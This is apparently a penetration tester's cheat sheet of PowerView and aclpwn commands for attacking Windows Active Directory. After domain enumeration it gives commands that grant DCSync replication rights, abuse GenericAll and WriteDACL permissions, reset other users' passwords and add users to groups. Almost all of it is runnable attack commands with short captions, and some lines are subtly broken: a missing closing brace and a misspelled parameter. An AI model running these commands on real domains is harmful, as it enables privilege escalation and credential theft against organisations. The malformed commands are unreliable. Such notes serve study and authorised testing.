Always download PowerView.ps1 from here (the non-dev version will be incompatible with a lot of guides).
Get-DomainController | Select-Object Forest, Name, OSVersion
Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess
Get-DomainUser -Identity <user> -Properties DisplayName, MemberOf | Format-List
Get-DomainComputer -Properties DnsHostName | Sort-Object -Property DnsHostName
Get-DomainOU -Properties Name | Sort-Object -Property Name
Get-DomainGroup -Identity 'Domain Admins' | Select-Object -ExpandProperty Member
Get-DomainGroupMember -Identity 'Domain Admins' | Select-Object MemberDistinguishedName
Get-DomainGPO -Properties DisplayName | Sort-Object -Property DisplayName
Get-DomainGPO -ComputerIdentity <computer> -Properties DisplayName | Sort-Object -Property DisplayName
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
Find-DomainUserLocation | Select-Object UserName, SessionFromName
Get-NetLocalGroup | Select-Object GroupName
Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain
Get-NetSession -ComputerName <computer> | Select-Object CName, UserName
Get-ObjectAcl -Identity offsec -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_}
Grant DCSync rights to user
Add-ObjectACL -TargetIdentity "dc=<>,dc=<>,dc=<>" -PrincipalIdentity <user> -Rights DCSync -Verbose
Check for users allowed to DCSync
Get-ObjectACL -DistinguishedName "dc=<>,dc=<>,dc=<>" -ResolveGUIDs | ? { ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
Add to the domain object
Requires the correct ACL.
Add-ObjectAcl -TargetDistignuishedName 'DC=<dc>' -PrincipalSamAccountName <user> -Rights All -Verbose
This can also be automated via aclpwn:
aclpwn -f <username> -ft user -t <domain> -tt domain -d <domain> -dp BloodHound -du neo4j --server <dc> -u <username> -sp <sp> -p <password>
Abuse GenericAll
Allows us to do whatever we want with the target object.
Find all Users the current user has GenericAll for:
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}
We can change the users password with net user <user> <newpassword> /domain
Find all Groups the current user has GenericAll for:
Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
We can add users to the group with net group <group> <user> /add /domain
Abuse WriteDACL
Allows to add new ACLs (e.g. GenericAll).
Find Users we have WriteDACL for:
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
Add GenericAll:
Add-DomainObjectAcl -TargetIdentity <targetuser> -PrincipalIdentity <user> -Rights All